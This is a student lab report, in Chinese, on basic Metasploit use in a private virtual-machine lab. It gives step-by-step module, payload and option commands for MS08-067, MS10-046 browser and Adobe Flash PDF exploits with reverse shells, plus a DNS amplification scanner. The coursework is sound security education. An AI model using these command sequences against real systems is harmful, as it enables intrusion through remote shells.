20155210 Exp5 MSF基础应用
Exp5 MSF基础应用
一个主动攻击实践,MS08-067
首先利用
msfconsole
启用msf终端然后利用
search MS08-067
搜索漏洞,会显示相应漏洞模块
如图:
根据上图,我们输入
use exploit/windows/smb/ms08_067_netapi
,选择相应的模块然后我们可以使用
show payloads
,查看可以使用的模块
如图:
然后根据上图,为获取靶机的shell,所以利用
set payload generic/shell_reverse_tcp
然后输入
show options
,查看配置信息,知道我们需要配置RHOST,LHOST,LPORT,target
如图:
- 输入
set RHOST 192.168.241.138
set LHOST 192.168.241.134
set LPORT 5210
进行配置
然后我们再次利用
show options
,查看配置信息
如图:
然后
exploit
进行监听
如图:
- 如果出现如下情况,关闭防火墙,就可以解决
针对浏览器的攻击,ms10_046
起初我打算做ms11_050,攻击IE浏览器,但是IE8.0版本,不能成功,可能是IE8.0已经修复相关漏洞了。
所以我选择了ms10_046,首先输入
search ms10_046
查找漏洞
如图:
由于我们要对浏览器进行攻击,所以我们输入
use use exploit/windows/browser/ms10_046_shortcut_icon_
然后我们输入
show payloads
,查看载荷进行选择,这里我仍用实验一中的载荷set payload generic/shell_reverse_tcp
如图:
我们利用
show options
查询需要配置的有,LPORT,LHOST,SRVHOST- 输入
set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5210
进行配置
- 再次查看配置信息
如图:
- 然后输入
exploit
生成URL
如图:
在windows端访问该URL,kali端如图:
输入
sessions
,可看到一个ID为1的连接
如图:
然后输入
session -i 1
,接入ID为1的连接,输入shell,获取成功。
如图:
针对客户端的攻击
首先还是先利用
search adobe
进行搜索
如图:
然后进行选择,我选择的是
use windows/fileformat/adobe_flashplayer_button
然后
set payload windows/meterpreter/reverse_tcp
,设置所用荷载,利用show options
查看所要配置的信息
如图:
- 输入如下代码,对LHOST,LPORT,FILENAME进行配置
set LHOST 192.168.241.134
set LPORT 5210
set FILENAME 20155210.pdf
输入
exploit
,生成20155210.pdf文件
如图:
输入
use exploit/multi/handler
,进入监听,并设置监听端口,主机号在windows端,打开20155210.pdf,成功回连
如图:
辅助模块应用
- 首先利用
show auxiliary
,查看辅助模块
我选择的是
scanner/dns/dns_amp
,扫描dns输入
show options
,查看配置
输入
exploit
进行监听
基础问题
用自己的话解释什么是exploit,payload,encode
exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击
payload:相当于shellcode前身,也就是后门的模板
encode:对payload进行编码
实验体会
我们应该尽可能的,去更新最新版的软件和系统,否则就会给黑客可乘之机。
比如,我们做的实验都是基于xp系统的,但是如果对win7、8、10,进行攻击则无效。
比如,我在做实验2时,想做老师给的例子,但是那个漏洞对IE8.0不好使。
我们没有一个可以针对现用系统或者软件的渗透攻击库,离实战还是很远的
转载于:https://www.cnblogs.com/panyinghao/p/8921439.html
20155210 Exp5 MSF基础应用相关推荐
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155216 Exp5 MSF基础应用
Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用. 一 ...
- 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 《网络对抗》Exp5 MSF基础应用
20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...
- 20155220 Exp5 MSF基础应用
Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 根据上图,我们输入use ...
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- Exp5 MSF基础应用 20164323段钊阳
网络对抗技术 20164323 Exp5 MSF基础应用 靶机 ip:192.168.1.229 kali ip:192.168.1.216 exploit选取 主动攻击:ms17_010_psexe ...
最新文章
- Android NDK 使用自己的共享库(Import Module)
- Redis的特性以及优势(附官网)
- Taro+react开发(67):数组中push返回的是长度
- jQuery之ajax错误调试分析
- 个人风格就是一种品牌
- 【中山市选2009】【BZOJ2463】谁能赢呢?
- cmd bat 相对命令
- 深入浅出分布式系统Raft协议
- DIV+CSS布局 - 弹性盒子布局
- 利用ENVI自带全球DEM数据计算区域平均高程
- java 实现微信搜索附近人功能
- 腾讯云服务器申请自助退款流程(图文教程)
- asp cstr 函数
- redis连接异常 redis.clients.jedis.exceptions.JedisClusterException: CLUSTERDOWN The cluster is down
- matlab2012簡明教程課後習題答案,MATLAB习题答案
- 怎么把视频转换成音频
- 密码库LibTomCrypt学习记录——(2.18)分组密码算法的工作模式——XTS代码
- HTML5中Audio对象volume属性的应用
- 【Android】玩转命令行工具-apkanalyzer
- uni-app腾讯地图位置选点
热门文章
- 爱奇艺体验Serverless极致扩缩容,资源利用率提升40%
- 从零点五开始用Unity做半个2D战棋小游戏(十一)
- SLF4J: Failed to load class “org.slf4j.impl.StaticLoggerBinder“
- netca 遇到TNS-04612: XXX 的 RHS 为空
- eclipse代码补全
- R语言中的特殊值 NA NULL NaN Inf
- BZOJ3083: 遥远的国度(树链剖分)
- ef AddDays报错
- django(7)modelform操作及验证、ajax操作普通表单数据提交、文件上传、富文本框基本使用...
- cocoapods Analyzing dependencies 问题的解决方案